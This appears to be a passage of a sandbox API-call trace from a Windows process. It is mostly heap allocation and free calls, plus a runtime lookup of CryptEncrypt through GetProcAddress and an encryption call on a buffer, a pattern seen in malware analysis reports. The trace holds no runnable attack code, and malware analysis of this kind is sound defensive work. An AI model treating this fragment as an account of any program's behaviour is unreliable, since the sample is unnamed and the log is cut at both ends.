0x2e54de8 [0147.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0147.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0147.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0147.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0147.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0147.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0147.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0147.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0147.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6d89) returned 0x2f21b40 [0147.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0147.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f21b40 | out: hHeap=0x970000) returned 1 [0147.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0147.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0147.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0147.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0147.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0147.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0147.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0147.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0147.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0147.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0147.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0147.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0147.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0147.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0147.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0147.814] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0147.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0147.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0147.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0147.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0147.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0147.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0147.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0147.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0147.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0147.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0147.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0147.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0147.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0147.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0147.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0147.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0147.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0147.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0147.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0147.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0147.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0147.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0147.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0147.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0147.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0147.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0147.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0147.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0147.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0147.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0147.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0147.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0147.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0147.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0147.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0147.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0147.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0147.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0147.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0147.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0147.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0147.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0147.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0147.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0147.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0147.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0147.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0147.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0147.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0147.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0147.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0147.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0147.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0147.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0147.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0147.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0147.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0147.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0147.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0147.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0147.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0147.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0147.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0147.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0147.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0147.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0147.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0147.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0147.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0147.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0147.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0147.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0147.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0147.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0147.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50b60, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0147.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0147.817] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0147.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0147.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0147.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0147.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0147.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0147.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0147.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0147.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0147.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0147.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0147.818] CryptEncrypt (in: hKey=0xa87510, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x6d89, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x6d90) returned 1 [0147.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0147.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0147.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0147.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0147.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0147.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0147.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0147.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0147.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0147.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0147.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0147.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0147.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0147.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0147.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0147.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0147.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0147.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0147.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0147.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0147.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0147.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0147.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0147.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0147.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0147.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0147.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0147.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0147.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0147.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0147.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0147.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0147.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0147.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0147.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0147.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0147.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0147.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0147.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0147.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0147.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0147.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0147.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0147.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0147.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0147.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0147.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0147.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0147.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0147.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0147.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0147.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0147.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0147.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0147.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0147.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0147.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0147.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0147.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0147.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0147.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0147.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0147.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0147.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0147.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0147.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0147.821] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0147.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0147.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0147.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0147.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0147.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0147.821] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0147.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0147.821] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0147.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0147.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0147.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0147.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0147.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0147.821] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0147.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0147.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0147.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0147.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0147.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0147.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0147.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0147.822] CharLowerBuffW (in: lpsz="byte[28048]", cchLength=0xb | out: lpsz="byte[28048]") returned 0xb [0147.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0147.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0147.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0147.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0147.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0147.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0147.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0147.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0147.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0147.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0147.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0147.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0147.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0147.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0147.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0147.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0147.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6d90) returned 0x2f21b40 [0147.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0147.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0147.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0147.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0147.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0147.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0147.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0147.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0147.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0147.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0147.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0147.823] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0147.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 